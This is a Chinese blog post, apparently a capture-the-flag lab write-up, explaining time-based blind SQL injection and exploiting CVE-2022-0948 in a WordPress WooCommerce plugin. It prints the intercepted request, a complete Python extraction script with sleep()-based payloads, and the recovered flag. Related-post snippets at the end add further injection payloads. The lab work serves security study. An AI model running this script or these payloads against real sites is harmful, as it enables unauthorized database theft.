延时盲注(CVE-2022-0948)

已于 2024-06-19 23:13:25 修改
阅读量10w+ 收藏
点赞数 1
文章标签: 网络 安全 网络安全 web安全
于 2023-10-14 23:42:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lkbzhj/article/details/133834068
版权
本文详细介绍了延时盲注的概念,如何通过利用执行时间差异判断SQL注入,以及在WordPress插件WooCommerce3.2.2之前的版本中的具体应用。攻击者通过构造时间敏感的SQL语句,绕过防护措施,强调了手工检查的困难及网络安全防护的重要性。
摘要由CSDN通过智能技术生成

详解:

延时盲注,也称为时间盲注或延迟注入,是一种利用执行时间差判断是否执行成功的盲注手法。攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。例如,如果注入成功,执行时间会变长;如果注入失败,执行时间则会变短。这种方法可以绕过一些常规的防护措施,例如防火墙和入侵检测系统,因此较为隐蔽和难以防范。

在延时盲注中,攻击者通常会利用sleep()函数制造时间延迟,由回显时间来判断是否报错。同时,攻击者还会结合if(expr1,expr2,expr3)语句等条件判断语句进行操作。例如,攻击者可以通过判断第一个字母的ASCII码是否为115来决定是否执行sleep()函数,进而控制执行时间。

虽然延时盲注是一种非常有效的注入攻击手段,但手工检查却相对困难,因为攻击者可以精确地控制执行时间,使得检测工具难以发现异常。因此,在进行网络安全防护时,我们需要加强对输入数据的检查和过滤,避免攻击者利用漏洞进行注入攻击。

靶场介绍:

WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞

测试流程:

http://eci-2ze56005hksymwwx442l.cloudeci1.ichunqiu.com/?rest_route=/olistener/new

在这页面存在延时注入

抓包

GET /?rest_route=/olistener/new HTTP/1.1
Host: eci-2ze56005hksymwwx442l.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1696949104,1697125365,1697270421,1697293979; _ga=GA1.2.959161918.1696849239; _ga_J1DQF09WZC=GS1.2.1696849239.1.0.1696849239.0.0.0; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1697293999; ci_session=f859fb0e48ad722fd2db1e95081050a41a635357
Upgrade-Insecure-Requests: 1

 延时盲注脚本

import requests
import time
def time_delay(url, headers, payload):
    start_time = time.time()
    response = requests.post(url, headers=headers, data=payload)
    end_time = time.time()
    #print(end_time,start_time)
    delay = end_time - start_time
    return delay
def time_based_blind_sql_injection(url, headers):
    result=[]
    for i in range(1, 100):
        for j in range(32,126):#r'0123456789abcdefghijklmnopqrstuvwxyz_-{}':
            #find db
            #payload = """{"id":" (if((substr(database(),%d,1))='%s',sleep(10),1))#"}""" % (i, j)
            #find table
            #payload = """{"id":" (if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            #find table -wp%
            payload = """{"id":" (if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not like 0x777025),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            #find column
            #payload = """{"id":" (if(ascii(substr((select count(column_name) from information_schema.columns where table_name='flag'),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            payload = """{"id":" (if(ascii(substr((select flag from ctf.flag),%d,1))=%d,sleep(10),1))#"}""" % (i, j)
            delay = time_delay(url, headers, payload)
            print('{ ',''.join(result),' } ->',i,'-',j,"time_delay:",delay)
            if delay > 9:
                result.append(chr(j))
                print(''.join(result))
                break
    else:
        print("The payload is not vulnerable to SQL injection.")
    print('result:',''.join(result))
if __name__ == "__main__":
    url = "http://eci-2ze56005hksymwwx442l.cloudeci1.ichunqiu.com/?rest_route=/olistener/new"
    headers = {
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Cookie': '_ga=GA1.2.617032228.1689668529; _ga_J1DQF09WZC=GS1.2.1689668531.1.0.1689668531.0.0.0',
    'Connection': 'close',
    'Content-Type': 'application/json',
    }
    
    time_based_blind_sql_injection(url, headers)

 注意:需根据自己实际情况对代码进行修改,不要盲目的复制粘贴

得到flag

flag{7f1e42f4-235d-4231-96f5-5823b039f572}

BTY@BTY
关注
学习延时盲注看这一篇就够了
qq_61553520的博客
04-17 234
延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据应用场景:当布尔盲注失效的情况下,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入。在实际测试中禁止使用延时盲注,因为会影响厂商的实际业务运行,当年某人注入了一个sleep(10)后,就被请去喝茶了,建议不要轻易使用延时盲注。时间盲注适合在布尔注入都失效的情况,结合sleep,if(,,)基于数据包返回时间测试的方法。
延时盲注(一)
qq_45300786的博客
07-13 1187
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 " and 1=2 %23 然后使用延时注入, " and sleep(5) %23 1,判断当前库名的长度 这里我们用到了数据库里的if语句 有点类似于三元运算,条件成立,就执行第二个,条件不成立就执行第三个。 " and if(length(database())=12,
【工具介绍】nuclei-yaml脚本编写
LongL_GuYu的博客
07-17 1623
【工具介绍】nuclei-yaml脚本编写
SQL注入--盲注(布尔与延时)
weixin_44940180的博客
08-07 1226
布尔与延时盲注的区别 首先,使用二者的前提是,在参数错误的情况下(例如:1’)不会返回报错信息 布尔盲注:在正确与错误参数下,页面返回的信息有所不同 延时盲注:不论输入正确或错误参数,页面没有明显区别 时间盲注更像是布尔盲注的升级,布尔盲注的时候比较直观的变化 所以这个时候基于时间的盲注,也就是在基于布尔的盲注上结合if判断和sleep()或benchmark()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断 盲注常使用的函数 length():确定字符长度 ascii():确定某个字
时间延迟盲注详解
weixin_30729609的博客
09-29 915
0x00 延迟注入定义 延迟注入,是一种盲注的手法,提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。 0x01 延迟注入的函数 sleep() ...
延迟盲注
Papiofelix's Area
09-03 264
Blind SQL Injection SQL盲注的利用方法及总结:http://www.myhack58.com/Article/html/3/7/2011/32223_2.htm 简单介绍Mysql和Mssql的延迟盲注 Mysql benchmark 的使用:http://blog.csdn.net/veverrr/article/details/6312461 在延迟盲注
春秋云镜 CVE-2022-0948
qq_22002773的博客
08-12 434
春秋云镜 CVE-2022-0948
时间盲注(延迟注入)
热门推荐
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1264
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5545
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
数据库手动注入到提权(Oracle、PostgreSQL、联合查询、布尔注入、报错注入、延时注入、堆查询注入、带外注入、写WebShell)
最新发布
墨痕诉清风的博客
07-24 639
Oracle类型判断PostgreSQL类型判断(特有的语法)
ThinkPHP3.2.X SQL注入漏洞的解决方案
amaoatao的博客
03-09 3544
程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误5次账号暂停24小时(后台参数可设置) 5.密码要先在本地加密(SHA1) 6.涉及API接口对接的项目全部使用AES加密(每个项目最好使用不同的密...
Web系统常见安全漏洞介绍及解决方案-sql注入
web15286201346的博客
07-31 924
使用ORM框架对sql注入是有积极意义的,在实际解决SQL注入时,还有一个难点就是应用复杂后,代码数量庞大,难以把可能存在sql注入的地方不遗漏的找出来,而ORM框架为我们发现问题提供了一个便捷的途径。这个探测方法有若干变体,例如,发送';例如,如果应用程序根据用户的输入(如用户名和密码)来查询用户帐户的数据库表,以认证用户,而攻击者能够将恶意数据注入查询的用户名部分(和/或密码部分),查询便可能更改成完全不同的数据复制查询,可能是修改数据库的查询,或在数据库服务器上运行Shell命令的查询。...
十几分钟让你学会MySQL布尔和延迟盲注手工操作
xiaoi123的博客
12-28 463
作者:Max老白Gān丶 链接:http://www.lofter.com/lpost/1fefbc76_12d25dc31 来源:LOFTER 注入常用到的几个函数     1 mid(str,1,3) 字符串获取 这里我们要看到123456789 从第一个字节也就是1开始获取到3就截止了   1 ...
【SQL注入05】延时盲注实例操作
Fighting_hawk的博客
02-19 3552
1. 理解延时盲注与布尔盲注的区别和联系; 2. 掌握延时盲注的方法。
CTF-Web30(延时盲注-难度大)
→_→
10-04 773
30.看起来有点难 分析: 一种方法直接使用工具Sqlmap直接跑出,username和password,然后登陆得到flag. 这里我们讲解另一种方法:延时盲注 测试?admin=1&pass=1&action=login报错,无法连接到数据库 测试?admin=admin'&pass=admin&action=login,报错,密码错误 这或许说明,admin=admin只要知道密码就行了。 这里本想直接用爆破,但是听说密码不是那种弱口令,或者...
sql注入之延时注入
weixin_45653478的博客
04-09 1970
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
MySQL延时盲注
一个普普通通的博客
03-01 1503
Mysql延时盲注
CVE-2022-41741, CVE-2022-41742
08-02
CVE-2022-41741和CVE-2022-41742是影响NGINX Plus、NGINX开源版以及NGINX企阅版的漏洞。CVE-2022-41741是一个内存损坏漏洞,CVSS评分为7.1(高危),而CVE-2022-41742是一个内存泄漏漏洞,CVSS评分为7.0(高危)。[1]为了修复这些漏洞,NGINX发布了稳定版nginx-1.22.1和主线版nginx-1.23.2,并包含了针对ngx_http_mp4_module中内存损坏和内存泄漏的修复补丁。[3]这些修复补丁可以帮助防止攻击者利用这些漏洞对系统造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值